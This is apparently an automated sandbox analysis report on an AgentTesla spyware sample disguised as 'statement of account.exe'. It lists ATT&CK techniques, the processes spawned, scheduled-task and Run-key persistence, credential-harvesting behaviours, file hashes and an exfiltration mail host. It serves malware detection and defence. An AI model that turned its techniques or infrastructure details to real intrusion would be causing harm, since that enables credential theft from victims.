                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts211
                Windows Management Instrumentation
                1
                Scheduled Task/Job
                111
                Process Injection
                1
                File and Directory Permissions Modification
                2
                OS Credential Dumping
                1
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                Exfiltration Over Other Network Medium1
                Encrypted Channel
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                Scheduled Task/Job
                1
                Registry Run Keys / Startup Folder
                1
                Scheduled Task/Job
                1
                Disable or Modify Tools
                111
                Input Capture
                114
                System Information Discovery
                Remote Desktop Protocol2
                Data from Local System
                Exfiltration Over Bluetooth1
                Non-Standard Port
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)1
                Registry Run Keys / Startup Folder
                1
                Deobfuscate/Decode Files or Information
                1
                Credentials in Registry
                311
                Security Software Discovery
                SMB/Windows Admin Shares1
                Email Collection
                Automated Exfiltration1
                Non-Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
                Obfuscated Files or Information
                NTDS1
                Process Discovery
                Distributed Component Object Model111
                Input Capture
                Scheduled Transfer11
                Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script23
                Software Packing
                LSA Secrets131
                Virtualization/Sandbox Evasion
                SSH1
                Clipboard Data
                Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common1
                Masquerading
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items131
                Virtualization/Sandbox Evasion
                DCSync1
                Remote System Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job111
                Process Injection
                Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                Hidden Files and Directories
                /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 756035 Sample: statement of account.exe Startdate: 29/11/2022 Architecture: WINDOWS Score: 100 56 Snort IDS alert for network traffic 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Sigma detected: Scheduled temp file as task from temp location 2->60 62 11 other signatures 2->62 7 LtdekfbHULJt.exe 5 2->7         started        10 statement of account.exe 6 2->10         started        13 LIhMQ.exe 5 2->13         started        15 LIhMQ.exe 2->15         started        process3 file4 78 Multi AV Scanner detection for dropped file 7->78 80 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->80 82 Machine Learning detection for dropped file 7->82 17 LtdekfbHULJt.exe 7->17         started        21 schtasks.exe 7->21         started        46 C:\Users\user\AppData\...\LtdekfbHULJt.exe, PE32 10->46 dropped 48 C:\Users\user\AppData\Local\...\tmp86BD.tmp, XML 10->48 dropped 50 C:\Users\...\statement of account.exe.log, ASCII 10->50 dropped 84 Injects a PE file into a foreign processes 10->84 23 statement of account.exe 2 5 10->23         started        26 schtasks.exe 1 10->26         started        86 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 13->86 28 LIhMQ.exe 13->28         started        30 schtasks.exe 13->30         started        32 LIhMQ.exe 13->32         started        signatures5 process6 dnsIp7 64 Tries to harvest and steal ftp login credentials 17->64 66 Tries to harvest and steal browser information (history, passwords, etc) 17->66 68 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->68 34 conhost.exe 21->34         started        52 mail.clipjoint.co.nz 27.54.86.236, 49698, 49699, 49700 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU Australia 23->52 54 192.168.2.1 unknown unknown 23->54 40 C:\Users\user\AppData\Roaming\...\LIhMQ.exe, PE32 23->40 dropped 42 C:\Windows\System32\drivers\etc\hosts, ASCII 23->42 dropped 44 C:\Users\user\...\LIhMQ.exe:Zone.Identifier, ASCII 23->44 dropped 70 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 23->70 72 Tries to steal Mail credentials (via file / registry access) 23->72 74 Modifies the hosts file 23->74 36 conhost.exe 26->36         started        76 Installs a global keyboard hook 28->76 38 conhost.exe 30->38         started        file8 signatures9 process10

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                statement of account.exe69%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                statement of account.exe37%VirustotalBrowse
                statement of account.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe69%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe69%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                SourceDetectionScannerLabelLinkDownload
                3.0.statement of account.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                https://6B3frV1LW6oD.com0%Avira URL Cloudsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                https://api.ipify.org%0%URL Reputationsafe
                http://MFxeXD.com0%Avira URL Cloudsafe
                http://mail.clipjoint.co.nz0%Avira URL Cloudsafe
                https://api.ipify.org%mail.clipjoint.co.nzclipjoint0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                mail.clipjoint.co.nz
                27.54.86.236
                truetrue
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://127.0.0.1:HTTP/1.1statement of account.exe, 00000003.00000002.524328070.000000000301C000.00000004.00000800.00020000.00000000.sdmp, LIhMQ.exe, 00000013.00000002.522475390.0000000003091000.00000004.00000800.00020000.00000000.sdmp, LtdekfbHULJt.exe, 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  http://www.apache.org/licenses/LICENSE-2.0statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.fontbureau.comstatement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.fontbureau.com/designersGstatement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.fontbureau.com/designers/?statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.founder.com.cn/cn/bThestatement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designers?statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://mail.clipjoint.co.nzstatement of account.exe, 00000003.00000002.539956248.0000000003374000.00000004.00000800.00020000.00000000.sdmp, LIhMQ.exe, 00000013.00000002.538143319.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, LtdekfbHULJt.exe, 00000016.00000002.539916642.0000000002D39000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwstatement of account.exe, 00000003.00000002.524328070.000000000301C000.00000004.00000800.00020000.00000000.sdmp, LIhMQ.exe, 00000013.00000002.522475390.0000000003091000.00000004.00000800.00020000.00000000.sdmp, LtdekfbHULJt.exe, 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://MFxeXD.comLtdekfbHULJt.exe, 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.tiro.comstatement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designersstatement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.goodfont.co.krstatement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://6B3frV1LW6oD.comLtdekfbHULJt.exe, 00000016.00000002.539916642.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, LtdekfbHULJt.exe, 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.carterandcone.comlstatement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.sajatypeworks.comstatement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.typography.netDstatement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designers/cabarga.htmlNstatement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.founder.com.cn/cn/cThestatement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.galapagosdesign.com/staff/dennis.htmstatement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://fontfabrik.comstatement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.founder.com.cn/cnstatement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers/frere-jones.htmlstatement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.jiyu-kobo.co.jp/statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.ipify.org%mail.clipjoint.co.nzclipjointstatement of account.exe, 00000003.00000002.524328070.000000000301C000.00000004.00000800.00020000.00000000.sdmp, LIhMQ.exe, 00000013.00000002.522475390.0000000003091000.00000004.00000800.00020000.00000000.sdmp, LtdekfbHULJt.exe, 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://DynDns.comDynDNSnamejidpasswordPsi/PsiLtdekfbHULJt.exe, 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.galapagosdesign.com/DPleasestatement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers8statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.fonts.comstatement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.sandoll.co.krstatement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.urwpp.deDPleasestatement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.zhongyicts.com.cnstatement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namestatement of account.exe, 00000000.00000002.283918247.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, LtdekfbHULJt.exe, 00000004.00000002.408840433.0000000002784000.00000004.00000800.00020000.00000000.sdmp, LIhMQ.exe, 0000000E.00000002.376580283.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.sakkal.comstatement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://api.ipify.org%statement of account.exe, 00000003.00000002.524328070.000000000301C000.00000004.00000800.00020000.00000000.sdmp, LIhMQ.exe, 00000013.00000002.522475390.0000000003091000.00000004.00000800.00020000.00000000.sdmp, LtdekfbHULJt.exe, 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        low
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        27.54.86.236
                                        mail.clipjoint.co.nzAustralia
                                        38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUtrue
                                        IP
                                        192.168.2.1
                                        Joe Sandbox Version:36.0.0 Rainbow Opal
                                        Analysis ID:756035
                                        Start date and time:2022-11-29 14:59:08 +01:00
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 9m 29s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:statement of account.exe
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:25
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.adwa.spyw.evad.winEXE@21/10@3/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HDC Information:Failed
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                        • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ocsp.digicert.com, ctldl.windowsupdate.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        TimeTypeDescription
                                        15:00:10API Interceptor658x Sleep call for process: statement of account.exe modified
                                        15:00:15Task SchedulerRun new task: LtdekfbHULJt path: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe
                                        15:00:26AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LIhMQ C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe
                                        15:00:36AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LIhMQ C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe
                                        15:00:48API Interceptor194x Sleep call for process: LtdekfbHULJt.exe modified
                                        15:00:49API Interceptor346x Sleep call for process: LIhMQ.exe modified
                                        No context
                                        No context
                                        No context
                                        No context
                                        No context
                                        Process:C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1216
                                        Entropy (8bit):5.355304211458859
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                        MD5:69206D3AF7D6EFD08F4B4726998856D3
                                        SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                        SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                        SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                        Process:C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1216
                                        Entropy (8bit):5.355304211458859
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                        MD5:69206D3AF7D6EFD08F4B4726998856D3
                                        SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                        SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                        SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                        Process:C:\Users\user\Desktop\statement of account.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1216
                                        Entropy (8bit):5.355304211458859
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                        MD5:69206D3AF7D6EFD08F4B4726998856D3
                                        SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                        SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                        SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                        Malicious:true
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                        Process:C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1645
                                        Entropy (8bit):5.190500583144773
                                        Encrypted:false
                                        SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBCtn:cbh47TlNQ//rydbz9I3YODOLNdq3O
                                        MD5:95165A753A50FBF4076FC03DDE554D61
                                        SHA1:8E57B353B7B6D536B8F6E0A90802C70C763FE5B8
                                        SHA-256:13D371BC519F4F3028907EFCB74B52741A40DD3ACF58FB4CB1E887298A78AF60
                                        SHA-512:E4595347C5118322BF77A4E87CB86F752D925D7220220C66E8287CB28946F8B3D6265BB849CB78C39C10CB2D6DAABDE896C4E7916C406D3B7002E53B2D968A1E
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                        Process:C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1645
                                        Entropy (8bit):5.190500583144773
                                        Encrypted:false
                                        SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBCtn:cbh47TlNQ//rydbz9I3YODOLNdq3O
                                        MD5:95165A753A50FBF4076FC03DDE554D61
                                        SHA1:8E57B353B7B6D536B8F6E0A90802C70C763FE5B8
                                        SHA-256:13D371BC519F4F3028907EFCB74B52741A40DD3ACF58FB4CB1E887298A78AF60
                                        SHA-512:E4595347C5118322BF77A4E87CB86F752D925D7220220C66E8287CB28946F8B3D6265BB849CB78C39C10CB2D6DAABDE896C4E7916C406D3B7002E53B2D968A1E
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                        Process:C:\Users\user\Desktop\statement of account.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1645
                                        Entropy (8bit):5.190500583144773
                                        Encrypted:false
                                        SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBCtn:cbh47TlNQ//rydbz9I3YODOLNdq3O
                                        MD5:95165A753A50FBF4076FC03DDE554D61
                                        SHA1:8E57B353B7B6D536B8F6E0A90802C70C763FE5B8
                                        SHA-256:13D371BC519F4F3028907EFCB74B52741A40DD3ACF58FB4CB1E887298A78AF60
                                        SHA-512:E4595347C5118322BF77A4E87CB86F752D925D7220220C66E8287CB28946F8B3D6265BB849CB78C39C10CB2D6DAABDE896C4E7916C406D3B7002E53B2D968A1E
                                        Malicious:true
